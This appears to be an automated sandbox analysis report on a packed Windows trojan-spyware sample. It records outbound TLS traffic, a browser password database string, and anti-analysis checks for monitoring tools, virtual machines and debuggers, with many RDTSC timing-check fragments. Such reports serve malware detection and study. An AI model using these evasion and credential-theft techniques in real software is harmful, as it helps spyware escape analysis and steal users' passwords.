                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49712 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49718 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49724 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49730 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49752 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49758 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49763 version: TLS 1.2

                System Summary

                Source: zi042476Iv.exe | Static PE information: section name:
                Source: zi042476Iv.exe | Static PE information: section name: .rsrc
                Source: zi042476Iv.exe | Static PE information: section name: .idata
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Code function: 0_3_013769BD
                Source: zi042476Iv.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: zi042476Iv.exe | Static PE information: Section: ZLIB complexity 0.9996234170751634
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: zi042476Iv.exe, 00000000.00000003.1383200376.0000000005C3D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382965546.0000000005C58000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: zi042476Iv.exe | Virustotal: Detection: 52%
                Source: zi042476Iv.exe | ReversingLabs: Detection: 57%
                Source: zi042476Iv.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: zi042476Iv.exe | String found in binary or memory: oRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeh`
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File read: C:\Users\user\Desktop\zi042476Iv.exe
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Section loaded: version.dll
                Source: zi042476Iv.exe | Static file information: File size 2941952 > 1048576
                Source: zi042476Iv.exe | Static PE information: Raw size of wwzrppjr is bigger than: 0x100000 < 0x2a4600

                Data Obfuscation

                Source: C:\Users\user\Desktop\zi042476Iv.exe | Unpacked PE file: 0.2.zi042476Iv.exe.160000.0.unpack :EW;.rsrc :W;.idata :W;wwzrppjr:EW;vmxrzajb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wwzrppjr:EW;vmxrzajb:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: zi042476Iv.exe | Static PE information: real checksum: 0x2d1d7a should be: 0x2da1e1
                Source: zi042476Iv.exe | Static PE information: section name:
                Source: zi042476Iv.exe | Static PE information: section name: .rsrc
                Source: zi042476Iv.exe | Static PE information: section name: .idata
                Source: zi042476Iv.exe | Static PE information: section name: wwzrppjr
                Source: zi042476Iv.exe | Static PE information: section name: vmxrzajb
                Source: zi042476Iv.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Code function: 0_3_01359C02 push edi; iretd 0_3_01359C49
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Code function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: zi042476Iv.exe | Static PE information: section name: entropy: 7.98432450240108

                Boot Survival

                Source: C:\Users\user\Desktop\zi042476Iv.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\zi042476Iv.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\zi042476Iv.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\zi042476Iv.exe | RDTSC instruction interceptor: First address: 1B922E second address: 1B9233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 363ECD second address: 363EE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 363EE9 second address: 363EF3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29FC6B5C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 363EF3 second address: 363F05 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F29FC52457Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 363F05 second address: 363F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36430E second address: 36433E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524588h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F29FC524582h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36433E second address: 364342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 364342 second address: 364361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F29FC5245B3h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29FC52457Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3678DD second address: 3678EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3678EC second address: 3678F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3678F2 second address: 3678F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3678F6 second address: 3678FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367985 second address: 3679F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F29FC6B5CA5h 0x0000000d jmp 00007F29FC6B5CA9h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F29FC6B5CA9h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push edi 0x0000001f pushad 0x00000020 jns 00007F29FC6B5C96h 0x00000026 jmp 00007F29FC6B5C9Ch 0x0000002b popad 0x0000002c pop edi 0x0000002d mov eax, dword ptr [eax] 0x0000002f push edx 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3679F7 second address: 367A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367A07 second address: 367A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F29FC6B5C98h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 stc 0x00000022 call 00007F29FC6B5C99h 0x00000027 push eax 0x00000028 push edx 0x00000029 jnl 00007F29FC6B5C9Ch 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367A42 second address: 367A5E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29FC524578h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29FC52457Bh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367A5E second address: 367A74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367C01 second address: 367C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F29FC524576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367EA6 second address: 367EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367FB8 second address: 367FC2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29FC524576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367FC2 second address: 367FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367FCC second address: 367FE4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007F29FC524584h 0x0000000f pushad 0x00000010 jc 00007F29FC524576h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3680A9 second address: 3680B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36818D second address: 368194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 368194 second address: 368199 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36864F second address: 36866B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC52457Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F29FC524576h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36866B second address: 368686 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29FC6B5CA3h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 368A39 second address: 368A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 368AE1 second address: 368B07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F29FC6B5C98h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 368B07 second address: 368B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 368C7B second address: 368C80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 368C80 second address: 368CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+124599BBh], ebx 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 jnl 00007F29FC524576h 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c jnc 00007F29FC524576h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3691C7 second address: 3691CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3691CB second address: 3691DD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F29FC524576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3691DD second address: 36923A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D1CDBh] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F29FC6B5C98h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b sub edi, dword ptr [ebp+122D37D5h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007F29FC6B5C98h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d mov edi, 070DB3BDh 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36923A second address: 369240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 369240 second address: 369256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d je 00007F29FC6B5CAAh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 369C1B second address: 369C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 369C1F second address: 369C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 369C25 second address: 369C42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524582h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36AC4D second address: 36AC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36AC51 second address: 36AC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F29FC524576h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36AC5F second address: 36AC6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36AC6C second address: 36AC82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F29FC52457Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36AC82 second address: 36ACBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 add dword ptr [ebp+122D1FDBh], ebx 0x0000000c push 00000000h 0x0000000e mov edi, dword ptr [ebp+122D3941h] 0x00000014 mov dword ptr [ebp+122D2A3Ch], ebx 0x0000001a push 00000000h 0x0000001c jmp 00007F29FC6B5C9Bh 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F29FC6B5C9Fh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36ACBB second address: 36ACC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36ACC1 second address: 36ACD4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F29FC6B5C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36ACD4 second address: 36ACD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36ACD8 second address: 36ACDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36B613 second address: 36B617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36B409 second address: 36B410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36B410 second address: 36B416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36BE7D second address: 36BE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36CA02 second address: 36CA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36E28D second address: 36E293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36E293 second address: 36E298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36E298 second address: 36E29E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36E29E second address: 36E2BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F29FC524586h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36DFC6 second address: 36DFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37141F second address: 371424 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 371424 second address: 371432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 371432 second address: 37144B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524585h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
